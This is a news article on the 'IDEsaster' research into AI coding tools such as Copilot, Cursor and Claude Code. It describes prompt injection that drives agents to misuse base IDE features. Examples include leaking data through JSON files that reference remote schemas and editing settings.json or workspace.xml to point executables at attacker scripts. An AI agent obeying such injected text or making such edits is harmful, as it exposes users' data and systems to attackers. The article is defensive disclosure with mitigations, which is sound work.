The research, codenamed “IDEsaster,” reveals that the very software layers powering modern AI coding tools such as GitHub Copilot, Cursor, Claude Code, and JetBrains Junie can be exploited through their integration with base IDE features.
Unlike earlier weaknesses that targeted individual AI extensions or configurations, IDEsaster exploits underlying mechanisms shared across multiple Integrated Development Environments (IDEs), such as Visual Studio Code, JetBrains IDEs, and Zed.dev, because these form the foundation for nearly all AI‑assisted coding tools; a single exploitable behavior can cascade across an entire ecosystem.
The vulnerabilities allow attackers to chain prompt injection with legitimate IDE functionality, creating a new pattern: Prompt Injection → Tools → Base IDE Features.
Once the AI agent is tricked into executing malicious instructions, it can manipulate standard IDE features to exfiltrate data or compromise the system without any apparent bug in the AI tool itself.
More than 30 vulnerabilities have been reported, 24 CVEs have been assigned, and at least 10 market‑leading AI development platforms have been confirmed affected.
Major vendors, including AWS, GitHub, and Roo Code, have released advisories or patches. An AWS bulletin (AWS‑2025‑019) and updated security guidance from Anthropic acknowledge the exposure underlying the scale of the risk.
Researchers demonstrated several exploitation scenarios. In one case, AI agents could leak sensitive data by writing JSON files that referenced remote schemas, causing the IDE to automatically send data to external servers.
Another showed how editing IDE‑level configuration files, such as VS Code’s .vscode/settings.json or JetBrains’ workspace.xml, could redirect executable paths to attacker-controlled scripts.
Multi‑root workspaces in Visual Studio Code further magnified the severity, enabling Remote Code Execution (RCE) even when prior mitigations blocked abuse of project‑specific settings.
CVEs like CVE‑2025‑54130, CVE‑2025‑53536, and CVE‑2025‑64660 document confirmed exploitation avenues.
The findings emphasize that legacy IDEs were never designed for autonomous AI agents capable of manipulating files or performing network actions. To address the growing AI‑integration risk, the research proposes a new principle: “Secure for AI.”
This extends traditional secure‑by‑design practices to consider how AI features change trust boundaries explicitly.
Mitigations include restricting tool scopes, applying human‑in‑the‑loop (HITL) controls, enforcing egress filtering, and sandboxing execution.
Developers are urged to use AI IDEs only with trusted projects and to review configurations for hidden prompt-injection vectors until vendors fully adopt the Secure for AI model.
Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates
The post AI Development Tools Hit by Major Security Flaws Affecting Millions appeared first on Cyber Security News.
PUBG: Blindspot is closing down later today (March 30) after just 53 days, meaning it…
ABILENE, Texas (KTAB/KRBC) – A house fire broke out Sunday night in north Abilene, where…
ABILENE, Texas (KTAB/KRBC) – A demonstration took place at Abilene City Hall on Saturday, organized…
ABILENE, Texas (KTAB/KRBC) - Abilene City Council Place 4 candidate Allison Carroll said her years…
March 28, 2026 Should a wife always obey her husband? One in four adults globally…
Invincible VS has confirmed Conquest as the 18th playable character in the upcoming 3v3 tag…
This website uses cookies.